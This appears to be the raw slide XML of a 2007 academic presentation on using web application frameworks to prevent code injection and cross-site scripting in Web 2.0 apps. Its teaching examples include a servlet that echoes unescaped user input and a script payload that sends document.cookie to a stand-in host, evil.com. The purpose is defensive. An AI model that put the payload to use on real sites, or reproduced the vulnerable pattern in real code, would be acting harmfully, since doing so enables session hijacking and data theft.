              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ServletResponseStream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out = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resp.getOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("&lt;p&gt;Hello, " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ ".&lt;/p&gt;");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3124200"/>
            <a:ext cx="7696200" cy="1295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2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill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</a:rPr>
              <a:t>&lt;script&gt;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location = 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	“http://evil.com/stealcookie.cgi?cookie= “  +	escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&lt;/script&gt;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19027758">
            <a:off x="1852893" y="1523139"/>
            <a:ext cx="5132932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600" b="1" cap="none" spc="0" dirty="0" smtClean="0">
                <a:ln w="28575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XSS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16600" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="28575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2187209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Most vulnerabilities are coding bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Making a mistake is very easy: default is often unsafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Getting things right requires non-trivial effort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Can you blame the developer for getting it wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="18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Currently Developers Do All the Heavy Lifting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Must deal with problem complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Filter input to remove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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,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&lt;object&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>To see how complex this is, check out XSS Cheat Sheet for filter evasion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ha.ckers.org/xss.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to find all ways that malicious input can propagate through the application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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 Web 2.0…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Much more execution happens on the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tons of code running within the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many new types of applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rich Webmail clients: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gmail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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hotmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mash-ups: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Live.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ig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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protopage.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Text editors: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Writely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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jot.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Entire operating systems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YouOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Cross-site Scripting &amp; Worms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Webmail Client (Dojo Toolkit)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827313"/>
            <a:ext cx="6949442" cy="4587774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25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2133600" y="4572000"/>
            <a:ext cx="5867400" cy="182880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ular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="5638800"/>
            <a:ext cx="609600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -128851"/>
              <a:gd name="adj2" fmla="val -13938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orchid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="4495800"/>
            <a:ext cx="48006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0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;td background=‘orchid’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>showTooltip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</a:rPr>
              <a:t>(‘orchid’)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Striped Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5829301" y="3619499"/>
            <a:ext cx="1447799" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow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1" name="Multiply 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="3886200"/>
            <a:ext cx="1752600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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8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Feed Injection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Mash-up Page Isolation Boundaries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981200"/>
            <a:ext cx="4576075" cy="441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Striped Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4800600" y="3429001"/>
            <a:ext cx="2971800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>eed  injection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381000" y="2209800"/>
            <a:ext cx="4572000" cy="1676400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4038600"/>
            <a:ext cx="4572000" cy="2362200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triped Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6553200" y="3505200"/>
            <a:ext cx="2971800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow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steal data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>from secure feed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Up-Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="3276600"/>
            <a:ext cx="685800" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst/>
          </a:pr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11" name="Multiply 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3505200"/>
            <a:ext cx="1752600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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25148-E385-491E-BAAB-B857DBE5E68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8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="1" animBg="1"/>
      <p:bldP spid="10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2427</TotalTime>
  <Words>1077</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>251</Paragraphs>
  <Slides>26</Slides>
  <Notes>0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Module</vt:lpstr>
      <vt:lpstr>Using Web Application Construction Frameworks to Protect Against  Code Injection Attacks</vt:lpstr>
      <vt:lpstr>State of Web Application Security (Web 1.0)</vt:lpstr>
      <vt:lpstr>Default is Unsafe!</vt:lpstr>
      <vt:lpstr>Currently Developers Do All the Heavy Lifting</vt:lpstr>
      <vt:lpstr>Enter Web 2.0…</vt:lpstr>
      <vt:lpstr>Cross-site Scripting &amp; Worms</vt:lpstr>
      <vt:lpstr>Webmail Client (Dojo Toolkit)</vt:lpstr>
      <vt:lpstr>Feed Injection</vt:lpstr>
      <vt:lpstr>Mash-up Page Isolation Boundaries</vt:lpstr>
      <vt:lpstr>Our Goal: Turn Things Around</vt:lpstr>
      <vt:lpstr>End-to-End Web App Security Vision</vt:lpstr>
      <vt:lpstr>Client-Side Runtime Enforcement</vt:lpstr>
      <vt:lpstr>Our Contributions</vt:lpstr>
      <vt:lpstr>Same-Origin Policy: Good vs Evil</vt:lpstr>
      <vt:lpstr>Same-Origin Lookup: Good vs Evil</vt:lpstr>
      <vt:lpstr>Extending Same-Origin Policy: Same-Origin++</vt:lpstr>
      <vt:lpstr>Blog with Comments</vt:lpstr>
      <vt:lpstr>Blog Code: HTML with Principals</vt:lpstr>
      <vt:lpstr>Extended Same-Origin Lookup</vt:lpstr>
      <vt:lpstr>How Do We Make This the Default?</vt:lpstr>
      <vt:lpstr>Web Applications are Built Using Frameworks</vt:lpstr>
      <vt:lpstr>Declaring a Isolated Content Pane</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Safe Default # 3: Defaults for More Complex Widgets</vt:lpstr>
      <vt:lpstr>Tree Widgets in Dojo</vt:lpstr>
      <vt:lpstr>Enforcing Dojo Tree Isolation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Security By Construction for Web 2.0 Applications</dc:title>
  <dc:creator>Ben Livshits</dc:creator>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>244</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-05-23T03:52:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-06-14T21:31:10Z</dcterms:modified>
</cp:coreProperties>
</file>